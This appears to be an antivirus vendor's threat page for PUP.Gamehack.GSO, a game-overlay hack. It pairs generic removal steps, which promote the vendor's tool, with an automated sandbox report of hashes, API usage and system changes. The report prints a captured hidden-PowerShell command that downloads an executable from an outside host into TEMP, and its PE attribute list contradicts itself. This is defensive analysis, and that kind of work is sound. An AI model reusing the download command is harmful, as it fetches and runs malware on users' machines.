PUP.Gamehack.GSO

The detection of PUP.Gamehack.GSO on your system indicates the presence of a potentially unwanted program (PUP) that may be causing issues with your computer's performance and security. It is essential to understand the nature of this threat and take immediate action to remove it and prevent further damage.

What Is PUP.Gamehack.GSO?

PUP.Gamehack.GSO is a type of malware that is classified as a potentially unwanted program. This category of threats includes software that may not be malicious in the classical sense but can still cause problems for users. PUPs often sneak onto systems through bundled downloads, misleading advertisements, or exploits in software. They can lead to a range of issues, from annoying pop-ups and slowed system performance to more serious security vulnerabilities.

How PUP.Gamehack.GSO Operates

Once installed, PUP.Gamehack.GSO may operate in various ways to achieve its goals, which could include displaying unwanted advertisements, collecting user data without consent, or even downloading additional malicious software. These programs often have the ability to modify system settings, which can lead to changes in browser behavior, such as altering the default search engine or homepage. They might also consume system resources, leading to decreased performance and increased risk of system crashes.

Symptoms of Infection

Symptoms of a PUP.Gamehack.GSO infection can vary but commonly include an increase in unwanted pop-ups or advertisements, unexpected changes to browser settings, slowed computer performance, and the presence of unfamiliar programs or toolbars. Users might also notice that their web searches are being redirected to unwanted sites or that their personal data is being collected without their knowledge or consent. Recognizing these symptoms early is crucial for minimizing the impact of the infection.

How to Remove PUP.Gamehack.GSO

  1. Enter Safe Mode with Networking: This will help prevent the malware from interfering with the removal process. Safe Mode starts Windows in a basic state, using a limited set of files and drivers, which can make it easier to remove the malware.
  2. Perform a Full Scan with a Reputable Tool: Utilize a trusted anti-malware tool, such as SpyHunter, to scan your system thoroughly. These tools are designed to detect and remove PUPs and other types of malware, ensuring your system is clean and secure.
  3. Uninstall Suspicious Programs: Go through the list of installed programs on your computer and uninstall any that you do not recognize or that were installed without your consent. Be cautious and ensure you are not removing essential system software.
  4. Reset Your Browser Settings: For browsers like Chrome, Firefox, and Edge, resetting the browser settings to their default values can help remove changes made by the PUP. This includes removing unwanted extensions, resetting the homepage, and clearing browsing data.
  5. Reboot and Re-scan: After taking these steps, reboot your computer and perform another scan with your anti-malware tool to ensure that all traces of the PUP have been removed. This step is crucial for confirming the effectiveness of the removal process.

Conclusion

Removing PUP.Gamehack.GSO requires a combination of technical knowledge and the right tools. By following the steps outlined above, you can effectively remove this potentially unwanted program from your system and restore your computer's performance and security. It's also important to take preventive measures, such as being cautious with downloads, keeping your software up to date, and regularly scanning your system for malware, to avoid future infections. Remember, staying vigilant and proactive is key to maintaining a secure and healthy computing environment.

Analysis Report

General information

Family Name: PUP.Gamehack.GSO
Signature status: No Signature

Known Samples

MD5: a7668609025ed001fad36544c0d4a50a
SHA1: 29f38e796e69b63b639bc1ca1fa28b87d34bdde5
SHA256: 75656681E5CF08D2AF0AD8F3A2BB88A8974C770D94F4BBD16B8DBD7975D2505A
File Size: 749.06 KB, 749056 bytes
MD5: 611362bc4aa194c52db4c95555d2b2b8
SHA1: bfd624709a48b3ddfd1c99500c670323e60545f0
SHA256: 5502060679AB6453EE97C27A07D9BA559061DF4B934C89AD3AD7D201A5D001E6
File Size: 9.64 MB, 9637552 bytes
MD5: 391b4d88bed80c0af1a4b2a82a7fd75f
SHA1: de029ce807430a4c2cd5ed087be9208b80d34e6e
SHA256: 3C040644F07FC00668D94B72AEAC0978496B9D168C6136E75EE3FF6950E4F84D
File Size: 8.50 MB, 8497664 bytes
MD5: f2d1bb13f3a555ba438bc6a1d85f2ac6
SHA1: c29a5e0e0991bc178c214da4ca55417389f2877f
SHA256: C682E74B5228290F5D4E6BFD2FF29B200D601133109FED64271E3866AA4F6C9A
File Size: 5.92 MB, 5924352 bytes
MD5: ef5dc7d52dc642308fa95d5439019d21
SHA1: db232052b7e3069f4b8160773d50a846aab6bc1d
SHA256: EA507D5BF7CA0C1FA23D5A3DCF3DF27829F86B78F23FC842B14013003DCB4CFA
File Size: 8.41 MB, 8411648 bytes
Show More
MD5: bc50729adf40b5e5fb01c26f0299e339
SHA1: 56bf737c4289fe9e94fb1552931ec85f8cf783b9
SHA256: E796647EEAE43F6D7A1E78C7F4DA58DF2BC02C7A2446E3B54CD957544FBB09CE
File Size: 9.41 MB, 9413120 bytes
MD5: 0d69b26b85f6f7cee71116495121963a
SHA1: 02249ab5941379fdb45425a7dd59ba367bf11715
SHA256: CA7C824C4E2148BAAA448DB5CEF85663131D5FF527C0183CB4EBF4E5BB3BD348
File Size: 563.20 KB, 563200 bytes
MD5: e758803d00481cfe45fecd37cb6a0ae7
SHA1: 1d8527c2aaf1fdcf721288a43d29691b86060342
SHA256: A4EFF77F7828B5324260E833DB2BF11161A1B0497DF48C07B292A8716464B3C8
File Size: 2.34 MB, 2337280 bytes

Windows Portable Executable Attributes

  • File doesn't have "Rich" header
  • File doesn't have exports table
  • File doesn't have security information
  • File has exports table
  • File has TLS information
  • File is 64-bit executable
  • File is console application (IMAGE_SUBSYSTEM_WINDOWS_CUI)
  • File is either console or GUI application
  • File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
  • File is Native application (NOT .NET application)
Show More
  • File is not packed
  • IMAGE_FILE_DLL is not set inside PE header (Executable)
  • IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)

File Icons

Windows PE Version Information

Name Value
Company Name Minkio Software
File Description Game Overlay Renderer
File Version 1.4.2.0
Internal Name MinkioOverlay
Legal Copyright Copyright (C) 2025 Minkio Software
Original Filename MinkioExternal.exe
Product Name Minkio Overlay
Product Version 1.4.2

Digital Signatures

Signer Root Status
Areeb Ahmed Code Signing LLC Areeb Ahmed Code Signing LLC Self Signed
Microsoft Corporation Microsoft Code Signing PCA 2011 Hash Mismatch
Microsoft Windows Software Compatibility Publisher Microsoft Windows Third Party Component CA 2013 Hash Mismatch

File Traits

  • dll
  • HighEntropy
  • imgui
  • No Version Info
  • ntdll
  • WriteProcessMemory
  • x64

Block Information

Total Blocks: 5,307
Potentially Malicious Blocks: 435
Whitelisted Blocks: 4,502
Unknown Blocks: 370

Visual Map

0 x ? x x x x x x x x x x x x x x x x x x x x ? x x x 0 0 0 x 0 0 0 0 0 0 0 x x x 0 0 0 0 0 0 0 0 0 0 0 x ? 0 0 0 0 0 0 0 0 0 ? ? 0 0 ? 0 ? ? ? ? 0 ? 0 0 ? ? ? ? ? 0 x 0 ? ? 0 ? 0 0 0 0 0 ? ? 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x ? 0 0 0 ? 0 0 ? 0 0 ? 0 0 ? 0 0 ? 0 0 0 0 0 0 ? 0 0 0 0 0 x 0 0 0 0 0 ? 0 0 0 0 0 ? 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 ? 0 0 0 0 ? x 0 0 0 0 0 0 ? 0 0 ? 0 0 ? 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x 0 ? x x x ? ? x 0 0 ? 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x ? x 0 0 0 0 0 0 0 0 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? ? ? x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 ? 0 0 ? 0 0 x 0 0 x 0 0 x x 0 x 0 x x 0 x x x x x x x 0 x x x x 0 x x x x 0 0 0 0 x 0 x 0 0 0 0 0 0 x 0 0 x x x 0 x x x x x 0 0 x 0 0 x x 0 x 0 x x x 0 x x 0 0 0 0 x 0 x 0 x x x x x x 0 0 x 0 0 x 0 0 0 0 x x x x x x 0 x x x x 0 x 0 x 0 0 0 x 0 0 0 x x 0 0 0 0 x x 0 x 0 0 0 0 0 x x 0 0 x 0 0 0 x 0 x x x x x 0 x x 0 0 0 x 0 0 0 0 0 0 0 1 0 x 0 0 0 x 0 0 0 0 x 0 0 x 0 0 0 0 1 0 x 0 0 x 0 x 0 x 0 0 0 x x x 0 x x 0 x x x 0 x 0 x 0 0 0 0 0 0 0 x 0 x 0 x 0 x 0 0 0 0 x 0 0 0 0 0 x x 0 x 0 0 0 x 0 0 ? x 0 0 0 0 0 0 ? 0 x x 0 0 0 0 0 x x x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x ? ? ? 0 ? 0 0 ? ? ? 0 ? 0 0 ? ? ? 0 0 0 ? ? 0 ? 0 ? ? x ? ? 0 ? ? ? x 0 ? ? 0 0 ? ? ? ? ? ? ? 0 ? ? ? ? 0 ? 0 ? ? ? 0 ? ? ? ? ? 0 ? ? ? ? ? ? ? ? ? 0 ? ? 0 ? 0 0 ? ? ? 0 x ? ? ? ? ? 0 ? ? ? ? ? ? ? 0 ? ? ? ? ? 0 ? ? 0 ? ? ? ? ? ? 0 0 0 ? ? 0 0 0 ? ? 0 0 0 ? ? 0 0 0 0 0 0 0 0 x 0 0 0 ? 0 0 0 ? 0 0 x 0 x x x x 0 ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 x 0 0 ? 0 x x 0 0 0 0 0 0 0 0 0 x 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 ? 0 0 x 0 x 0 0 x 0 0 0 0 0 0 0 x x x x x 0 0 x 0 x 0 x 0 0 0 x 0 0 0 x 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? x ? 0 ? x x 0 x x x x 0 ? ? 0 0 0 ? 0 0 0 0 0 0 0 0 x x x ? ? 0 ? x 0 0 x 0 0 x 0 0 0 0 0 0 0 0 0 1 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 ? ? ? ? ? ? 0 ? ? ? 0 ? ? 0 ? ? 0 0 ? ? ? ? ? 0 ? ? 0 ? ? ? ? ? ? ? ? 0 ? 0 ? 0 ? ? 0 ? ? ? 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x ? ? ? ? ? ? ? 0 ? ? ? ? ? ? ? ? ? ? ? ? ? 0 ? ? ? 0 0 x ? ? ? ? ? ? ? 0 ? ? ? 0 ? 0 ? ? 0 x ? 0 ? ? ? ? 0 ? 0 x ? 0 ? ? ? ? 0 ? ? 0 ? ? 0 ? ? ? ? ? ? ? ? ? ? 0 0 0 ? ? ? ? ? ? ? 0 ? ? 0 ? ? 1 0 ? ? 0 ? ? 0 ? ? ? ? ? 0 ? ? 0 ? ? 0 ? ? 0 0 0 0 0 x 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 x 0 x x 0 x 0 0 0 x x 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 ? x x x 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 x 0 0 1 0 0 0 1 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x x x 0 0 0 x 0 0 x x x 0 0 0 0 x 0 0 x 0 0 0 0 x x x 1 0 0 0 0 0 0 0 x 0 x 0 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 x 0 0 0 1 0 x 0 0 0 0 0 0 0 0 0 x x x 0 0 0 0 0 0 x 0 0 0 0 0 0 0 x x 0 0 0 x x x 0 0 0 0 0 x 0 x x x 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 x 0 0 0 x 0 0 0 0 x 0 x 0 x x 0 0 0 ? 0 ? 0 0 0 0 x 0 0 x 0 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x 0 x x x x 0 0 0 0 0 0 0 0 0 0 0 0 x x x 0 0 x 0 0 x 0 0 1 0 0 1 0 0 0 0 0 0 0 0 0 x x 0 x 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 x 0 0 0 0 0 0 0 x x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 x 0 x 0 0 x x x x x x x 0 x 0 x 0 0 0 0 0 0 0 0 0 x 0 0 0 0 x x 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x x 1 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 1 0 0 0 1 x x x 0 0 0 1 0 0 0 0 1 0 0 1 0 0 1 0 0 1 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 1 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ? x 0 0 0 x 0 0 0 0 x x x 0 0 0 0 0 0 x 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 x 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
... Data truncated
0 - Probable Safe Block
? - Unknown Block
x - Potentially Malicious Block

Similar Families

  • Gamehack.GSR
  • RobloxHack.LE
  • RobloxStealer.B

Files Modified

File Attributes
\device\namedpipe\gmdasllogger Generic Write,Read Attributes
\device\namedpipe\pshost.134232212191987039.5588.defaultappdomain.powershell Generic Read,Write Data,Write Attributes,Write extended,Append data,LEFT 524288
c:\users\user\appdata\local\microsoft\windows\usrclass.dat{dba6b5ef-640a-11ed-9bcb-f677369d361c}.txr.0.regtrans-ms Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\microsoft\windows\usrclass.dat{dba6b5ef-640a-11ed-9bcb-f677369d361c}.txr.1.regtrans-ms Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\microsoft\windows\usrclass.dat{dba6b5ef-640a-11ed-9bcb-f677369d361c}.txr.2.regtrans-ms Generic Read,Write Data,Write Attributes,Write extended,Append data
c:\users\user\appdata\local\temp\__psscriptpolicytest_2hf4aavw.xmg.ps1 Generic Write,Read Attributes
c:\users\user\appdata\local\temp\__psscriptpolicytest_x4wcpang.hwm.psm1 Generic Write,Read Attributes

Registry Modifications

Key::Value Data API Name
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe ��]\|�� RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 梀屧ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\cmd.exe 㣙岽ǜ RegNtPreCreateKey
HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe 鬓岿ǜ RegNtPreCreateKey

Windows API Usage

Category API
Syscall Use
  • ntdll.dll!NtAccessCheck
  • ntdll.dll!NtAddAtomEx
  • ntdll.dll!NtAlertThreadByThreadId
  • ntdll.dll!NtAllocateLocallyUniqueId
  • ntdll.dll!NtAllocateReserveObject
  • ntdll.dll!NtAlpcAcceptConnectPort
  • ntdll.dll!NtAlpcConnectPort
  • ntdll.dll!NtAlpcConnectPortEx
  • ntdll.dll!NtAlpcCreatePort
  • ntdll.dll!NtAlpcCreateSecurityContext
Show More
  • ntdll.dll!NtAlpcDeleteSecurityContext
  • ntdll.dll!NtAlpcOpenSenderProcess
  • ntdll.dll!NtAlpcQueryInformation
  • ntdll.dll!NtAlpcSendWaitReceivePort
  • ntdll.dll!NtApphelpCacheControl
  • ntdll.dll!NtAssociateWaitCompletionPacket
  • ntdll.dll!NtClearEvent
  • ntdll.dll!NtClose
  • ntdll.dll!NtCompareSigningLevels
  • ntdll.dll!NtConnectPort
  • ntdll.dll!NtCreateEvent
  • ntdll.dll!NtCreateFile
  • ntdll.dll!NtCreateIoCompletion
  • ntdll.dll!NtCreateKey
  • ntdll.dll!NtCreateMutant
  • ntdll.dll!NtCreatePrivateNamespace
  • ntdll.dll!NtCreateSection
  • ntdll.dll!NtCreateSemaphore
  • ntdll.dll!NtCreateThreadEx
  • ntdll.dll!NtCreateTimer
  • ntdll.dll!NtCreateTimer2
  • ntdll.dll!NtCreateWaitCompletionPacket
  • ntdll.dll!NtCreateWorkerFactory
  • ntdll.dll!NtDelayExecution
  • ntdll.dll!NtDeleteValueKey
  • ntdll.dll!NtDeviceIoControlFile
  • ntdll.dll!NtDuplicateObject
  • ntdll.dll!NtDuplicateToken
  • ntdll.dll!NtEnumerateKey
  • ntdll.dll!NtEnumerateValueKey
  • ntdll.dll!NtFindAtom
  • ntdll.dll!NtFlushProcessWriteBuffers
  • ntdll.dll!NtFreeVirtualMemory
  • ntdll.dll!NtFsControlFile
  • ntdll.dll!NtGetCachedSigningLevel
  • ntdll.dll!NtMapViewOfSection
  • ntdll.dll!NtNotifyChangeKey
  • ntdll.dll!NtOpenDirectoryObject
  • ntdll.dll!NtOpenEvent
  • ntdll.dll!NtOpenFile
  • ntdll.dll!NtOpenKey
  • ntdll.dll!NtOpenKeyEx
  • ntdll.dll!NtOpenMutant
  • ntdll.dll!NtOpenProcess
  • ntdll.dll!NtOpenProcessToken
  • ntdll.dll!NtOpenProcessTokenEx
  • ntdll.dll!NtOpenSection
  • ntdll.dll!NtOpenSemaphore
  • ntdll.dll!NtOpenSymbolicLinkObject
  • ntdll.dll!NtOpenThread
  • ntdll.dll!NtOpenThreadToken
  • ntdll.dll!NtOpenThreadTokenEx
  • ntdll.dll!NtProtectVirtualMemory
  • ntdll.dll!NtQueryAttributesFile
  • ntdll.dll!NtQueryDebugFilterState
  • ntdll.dll!NtQueryDefaultLocale
  • ntdll.dll!NtQueryDirectoryFileEx
  • ntdll.dll!NtQueryFullAttributesFile
  • ntdll.dll!NtQueryInformationFile
  • ntdll.dll!NtQueryInformationJobObject
  • ntdll.dll!NtQueryInformationProcess
  • ntdll.dll!NtQueryInformationThread
  • ntdll.dll!NtQueryInformationToken
  • ntdll.dll!NtQueryKey
  • ntdll.dll!NtQueryLicenseValue
  • ntdll.dll!NtQueryObject
  • ntdll.dll!NtQueryPerformanceCounter
  • ntdll.dll!NtQuerySecurityAttributesToken
  • ntdll.dll!NtQuerySecurityObject
  • ntdll.dll!NtQuerySymbolicLinkObject
  • ntdll.dll!NtQuerySystemInformation
  • ntdll.dll!NtQuerySystemInformationEx
  • ntdll.dll!NtQueryValueKey
  • ntdll.dll!NtQueryVirtualMemory
  • ntdll.dll!NtQueryVolumeInformationFile
  • ntdll.dll!NtQueryWnfStateData
  • ntdll.dll!NtQueryWnfStateNameInformation
  • ntdll.dll!NtReadFile
  • ntdll.dll!NtReadRequestData
  • ntdll.dll!NtReadVirtualMemory
  • ntdll.dll!NtReleaseMutant
  • ntdll.dll!NtReleaseSemaphore
  • ntdll.dll!NtReleaseWorkerFactoryWorker
  • ntdll.dll!NtRemoveIoCompletionEx
  • ntdll.dll!NtRequestWaitReplyPort
  • ntdll.dll!NtResumeThread
  • ntdll.dll!NtSetEvent
  • ntdll.dll!NtSetInformationFile
  • ntdll.dll!NtSetInformationKey
  • ntdll.dll!NtSetInformationObject

26 additional items are not displayed above.

Process Manipulation Evasion
  • NtUnmapViewOfSection
Anti Debug
  • IsDebuggerPresent
  • NtQuerySystemInformation
User Data Access
  • GetUserDefaultLocaleName
  • GetUserObjectInformation
Process Shell Execute
  • CreateProcess
Process Terminate
  • TerminateProcess
Encryption Used
  • BCryptOpenAlgorithmProvider
  • CryptAcquireContext
Other Suspicious
  • AdjustTokenPrivileges

Shell Command Execution

C:\WINDOWS\system32\cmd.exe cmd.exe /c powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=9UHkJuvH1q5iXCdVrZDSW01.txt' -OutFile $env:TEMP\BK288768.exe
C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "& { iwr -Uri 'https://vcc-library.uk/Stb/Retev.php?bl=9UHkJuvH1q5iXCdVrZDSW01.txt' -OutFile $env:TEMP\BK288768.exe